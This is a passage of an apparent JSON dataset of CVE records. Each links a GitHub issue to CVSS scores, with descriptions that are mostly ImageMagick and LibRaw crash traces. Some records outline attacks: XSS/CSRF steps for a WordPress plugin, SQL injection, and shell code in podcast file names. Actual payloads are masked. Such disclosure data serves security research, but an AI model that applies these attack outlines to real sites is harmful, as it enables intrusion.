NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fdb NUMBERTAG in posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG b1 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c9 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG fb in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG fda NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e6 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e2a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ef6b0 in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG fd NUMBERTAG fa in APITAG APITAG NUMBERTAG f NUMBERTAG fdb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG cba in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG ebeacd in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c9e in main APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14341",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/654",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/654",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-06T13:51:09Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14342",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/650",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/650",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-05T17:16:36Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory exhaustion vulnerability was found in function APITAG which allow attackers to cause a denial of service via a crafted file. ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14343",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/649",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/649",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-05T15:09:44Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG POC: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14348",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/100",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/100",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2017-09-12T06:43:06Z",
        "description": "Heap buffer overflow in APITAG Sample: CVETAG Credit: Henri Salo from Nixu Corporation Tools: afl NUMBERTAG b, afl utils, GCC APITAG ~~~ ./raw identify APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ee NUMBERTAG at pc NUMBERTAG febd8ff NUMBERTAG d bp NUMBERTAG ffc NUMBERTAG c NUMBERTAG e NUMBERTAG sp NUMBERTAG ffc NUMBERTAG c NUMBERTAG e NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ee NUMBERTAG thread T NUMBERTAG febd8ff NUMBERTAG c in APITAG int, unsigned char , unsigned int) APITAG NUMBERTAG febd NUMBERTAG da9 in APITAG int) APITAG NUMBERTAG febd NUMBERTAG de NUMBERTAG in APITAG APITAG NUMBERTAG febd NUMBERTAG f3fd in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG d7ea in APITAG APITAG NUMBERTAG febd NUMBERTAG b0cc in APITAG APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG c6 in APITAG ) APITAG NUMBERTAG febd NUMBERTAG be1b2 in APITAG const , long long) APITAG NUMBERTAG a9 in main samples/raw APITAG NUMBERTAG febd NUMBERTAG db NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG ee NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG febd NUMBERTAG cb NUMBERTAG f in malloc ( PATHTAG NUMBERTAG febd NUMBERTAG b NUMBERTAG b in APITAG long) APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG b in APITAG long) APITAG NUMBERTAG febd NUMBERTAG d5e in APITAG int) APITAG NUMBERTAG febd NUMBERTAG de NUMBERTAG in APITAG APITAG NUMBERTAG febd NUMBERTAG f3fd in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG d7ea in APITAG APITAG NUMBERTAG febd NUMBERTAG b0cc in APITAG APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG c6 in APITAG ) APITAG NUMBERTAG febd NUMBERTAG be1b2 in APITAG const , long long) APITAG NUMBERTAG a9 in main samples/raw APITAG NUMBERTAG febd NUMBERTAG db NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG int, unsigned char , unsigned int) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fd fd NUMBERTAG c NUMBERTAG fff9dd0: fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING ~~~",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14400",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/746",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/746",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-11T09:38:24Z",
        "description": "Null Pointer Dereference in APITAG APITAG poc1 version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : URLTAG trigger command : ./magick convert im_poc NUMBERTAG output.mpc ./magick convert output.mpc output.uil detail : APITAG APITAG PATHTAG ./magick im_poc NUMBERTAG out.mpc PATHTAG ./magick out.mpc out.aai ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG edb NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG e0 sp NUMBERTAG ffd NUMBERTAG T NUMBERTAG f NUMBERTAG edb NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG fe in APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG d8 in APITAG APITAG NUMBERTAG f NUMBERTAG e0d5f in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e1f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG e1 in APITAG APITAG NUMBERTAG c2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV APITAG APITAG NUMBERTAG ABORTING APITAG APITAG APITAG Security Lab",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14500",
        "Issue_Url_old": "https://github.com/akrennmair/newsbeuter/issues/598",
        "Issue_Url_new": "https://github.com/akrennmair/newsbeuter/issues/598",
        "Repo_new": "akrennmair/newsbeuter",
        "Issue_Created_At": "2017-09-16T18:03:42Z",
        "description": "Remote code execution in Podebuter. Dear users, On the heels of the previous vulnerability we have a similar one in Podbeuter. An attacker can craft an RSS item where the name of media enclosure (the podcast file) contains shell code. When user plays the file in Podbeuter, the shell code will be executed. If you're using Podbeuter only to download podcasts, not play them, you're safe. Podbeuter versions NUMBERTAG through NUMBERTAG are affected. I'm still waiting for CVE. APITAG a request to MITRE on August NUMBERTAG th, pinged them on September NUMBERTAG th, but got nothing back.) Workaround ========== Don't play any podcasts in Podbeuter until you apply the fix. Resolution ========== A fix has already been pushed to our Git repository: URLTAG A patch for NUMBERTAG is also available: URLTAG I'll notify oss EMAILTAG APITAG so distributions ought to pick this up soon enough.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14501",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/949",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/949",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2017-09-16T19:13:48Z",
        "description": "out of bounds read in APITAG Hi The following was reported downstream in Debian in CVETAG The reproducer (compressed with gzip), base NUMBERTAG APITAG is CODETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14503",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/948",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/948",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2017-09-16T18:50:05Z",
        "description": "out of bounds read in APITAG Hi The following was reported downstream in Debian at CVETAG The APITAG base NUMBERTAG encoded is: APITAG ` tested against APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14505",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/716",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/716",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-31T17:47:48Z",
        "description": "Null Pointer Dereference triggered by malformed Image File. A Null Pointer Dereference issue is present in the APITAG function in the file PATHTAG This is due to the following vulnerable code: CODETAG The variable _dasharray_ gets the output of APITAG Looking at the code within this function, the following code explicitly returns NULL : APITAG Eventually _q_ gets the value stored in _dasharray_ (which is potentially NULL ) in APITAG Finally, _q_ gets explicitly dereferenced in APITAG Using APITAG would resolve the Null Pointer Dereference vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14530",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/9",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/9",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-10-27T09:34:16Z",
        "description": "Cross Site Scripting (XSS) & Cross Site Request Forgery (CSRF) in Crony Cronjob Manager Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name: XSS & CSRF in Crony Cronjob Manager Version NUMBERTAG Software: Crony Cronjob Manager Version NUMBERTAG APITAG Plugin) Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG name APITAG variable with APITAG payload and send the request to the server after generating CSRF request to the victim Now, the added XSS payload will be executed on the victim machine and victim machine can be compromised. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The POST Request of the variable APITAG name APITAG in the URL URLTAG is vulnerable to XSS and the plugin is also exploitable using CSRF vulnerability. Whereas, explained in details with screenshots below. FILETAG APITAG NUMBERTAG APITAG Cronjobs list before CSRF code & XSS Payload gets executed. FILETAG APITAG NUMBERTAG APITAG name variable input field which is vulnerable to XSS FILETAG APITAG NUMBERTAG APITAG Capturing the HTTP request in intercept proxy FILETAG APITAG NUMBERTAG APITAG Created a crafted HTML page with XSS input and CSRF Request APITAG APITAG After creating the CSRFT HTML page the user logout and then again login in and then the HTML page is executed. In this case we have executed it from local machine. FILETAG APITAG NUMBERTAG APITAG XSS Payload gets executed in the browser once the link sent by the attacker has been clicked. FILETAG APITAG NUMBERTAG APITAG XSS payload gets executed and a new cronjob is created. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (attacker NUMBERTAG Click to APITAG new cronjob\u201d in Crony Cronjob Manager Version NUMBERTAG Plugin and capture the request in intercepting proxy NUMBERTAG Now, Generate a CSRF Request with attacker logged in account NUMBERTAG Modify the request with the code you required to get executed in victim\u2019s browser NUMBERTAG Enter the value for the APITAG name APITAG variable with \u201cXSS&CSRF\u201d and add any scripts, malicious code or payload NUMBERTAG Here, its APITAG which an attacker wants to get executed in victim\u2019s browser and sends the link to victim NUMBERTAG Now, once the victim opens the link in the user logged in browser. Then, immediately the added XSS payload will be executed whenever we review it. APITAG APITAG NUMBERTAG Discovered in Crony Cronjob Manager Version NUMBERTAG Reported to EMAILTAG rg & EMAILTAG NUMBERTAG EMAILTAG replied, \"I'll check it out, thanks for the heads up NUMBERTAG Another response from developer, \"I'll be back into things tomorrow morning, will let you know once it's up NUMBERTAG Issues fixed in version NUMBERTAG developer responded. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2017-14531",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/718",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/718",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-02T17:23:58Z",
        "description": "memory exhausted in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG APITAG is from file as follow: APITAG APITAG is NUMBERTAG bit, it can be large as NUMBERTAG ffffffff. and APITAG can max use NUMBERTAG G RAM, even if the image file is very small. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14532",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/719",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/719",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-03T15:03:33Z",
        "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so APITAG will access Null pointer to cause memory error. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14533",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/648",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/648",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-05T14:49:37Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14600",
        "Issue_Url_old": "https://github.com/delta/pragyan/issues/228",
        "Issue_Url_new": "https://github.com/delta/pragyan/issues/228",
        "Repo_new": "delta/pragyan",
        "Issue_Created_At": "2017-09-14T08:45:02Z",
        "description": "Found NUMBERTAG SQL injection vulnerabilities. both two vulnerabilities need to login as admin first in APITAG line NUMBERTAG ERRORTAG function APITAG ERRORTAG no filter at all, so we can cause a boolean base sql injection. APITAG like: APITAG the second one in line NUMBERTAG ERRORTAG function APITAG ERRORTAG APITAG has nothing to do with sql injection, so we can use error base sql injection APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-14604",
        "Issue_Url_old": "https://github.com/freedomofpress/securedrop/issues/2238",
        "Issue_Url_new": "https://github.com/freedomofpress/securedrop/issues/2238",
        "Repo_new": "freedomofpress/securedrop",
        "Issue_Created_At": "2017-09-01T00:36:32Z",
        "description": "Investigate potential attempt to compromise SVS. Kevin Poulsen just tweeted URLTAG a snippet of code that he says he received on his APITAG The code snippet is incomplete, but it appears to be an attempt to exfiltrate sensitive data from the airgapped Secure Viewing Station (SVS). Normally we would prefer to discuss potential security issues privately, in order to develop and deploy a fix without encouraging potential exploitation in case this really is a security vulnerability. In this case, the cat's out of the bag thanks the issue being reported publicly on Twitter, so we feel it's best to discuss it on an open forum in the interest of transparency.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14607",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/765",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/765",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-19T09:55:55Z",
        "description": "Heap buffer over read in APITAG version: CODETAG gcc APITAG NUMBERTAG APITAG NUMBERTAG crash case: FILETAG trigger command : APITAG detail: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-14608",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/101",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/101",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2017-09-13T03:32:23Z",
        "description": "Stack out of bounds read in APITAG Command to reproduce: APITAG FILETAG ERRORTAG gdb debug output: ERRORTAG we could see that the index of curve is a large negative number APITAG , leads out of bounds read.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14624",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/722",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/722",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-03T15:05:21Z",
        "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ( messages)[length+offset] will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14625",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/721",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/721",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-03T15:05:00Z",
        "description": "Null Pointer Dereference in sixel_decode and sixel_output_create. APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG CODETAG APITAG may return NULL, so ( palette)[n NUMBERTAG n] and output >xxx will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-14626",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/720",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/720",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-03T15:03:51Z",
        "description": "Null Pointer Dereference in sixel_decode. APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG APITAG may return NULL, so ( palette)[n NUMBERTAG will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
